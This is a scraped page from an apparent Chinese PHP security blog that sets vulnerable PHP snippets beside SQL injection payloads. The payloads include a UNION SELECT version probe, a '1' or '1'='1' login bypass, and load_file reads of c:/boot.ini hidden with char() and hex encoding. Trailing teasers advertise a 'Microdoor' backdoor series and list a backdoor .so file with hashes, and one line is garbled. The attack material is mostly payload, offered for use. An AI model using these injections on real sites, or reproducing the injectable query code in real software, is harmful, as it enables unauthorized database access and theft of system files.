//2011-11-13 星期日// 程式設計師的思維:
// micropoor.php ---**片段
<?php
$id= $_get['id'];
$query= "select * from users where id= ' 「 .$id." ;"
//略
?>
//我們的思維:
index.php?id=1+union+select+1,@@version+from+users--
// 程式設計師的思維:
---**片段
<?
$user = $_post['user'];
$pass = $_post['pass'];
$link = mysql_connect('localhost', 'root', 'pass') or die('error: '.mysql_e
rror());
mysql_select_db("sql_inj", $link);
$query = mysql_query("select * from sql_inj where user ='".$user."' and pass ='" .$pass. "'",$link);
if (mysql_num_rows($query) == 0)
$logged = 1;
?>
//我們的思維:
$user = 1' or '1' = '1
$pass = 1' or '1' = '1
新聞也瘋狂:
- 低調求發展0 {0 d& q9 s i: b$ o! f
// 程式設計師的思維:// micropoor.php ---**片段
//注:當前條件:magic_quotes_gpc = off,root
select * from article where articleid=$id
//我們的思維:
-1 union select 1,1,1,1,load_file('c:/boot.ini')
//變質為:
select * from article where articleid=-1 union select 1,1,1,1,load_file('c:/boot.ini')
//我們的思維變身:(char 函式)
-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
//繼續變身:
select * from article where articleid=-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)
PHP安全新聞早8點 1120
2011 11 20 星期日 插入篇 asp篇 程式設計師的思維 micropoor.asp 片段 dim upload,file,formname,formpath,icount,fileformat 略 end function formpath 2010 略 set file upload.f...
PHP安全新聞早8點 1116
2011 11 16 星期三 程式設計師的思維 micropoor.php 片段 micropoor get micropoor include micropoor.php 我們的思維 url 程式設計師的思維 micropoor.php 片段 略 fp fopen cachefile,w fwri...
php安全新聞早八點 Microdoor 第三季
microdoor系列分為持續滲透的許可權把控系列,部分為目前已成熟的輪子。會持續更新下去。php5.x x32 backdoor for linux public x32.so size 26127 bytes md5 9bf67665fdcb30c355358624dbeb79bb sha1 3...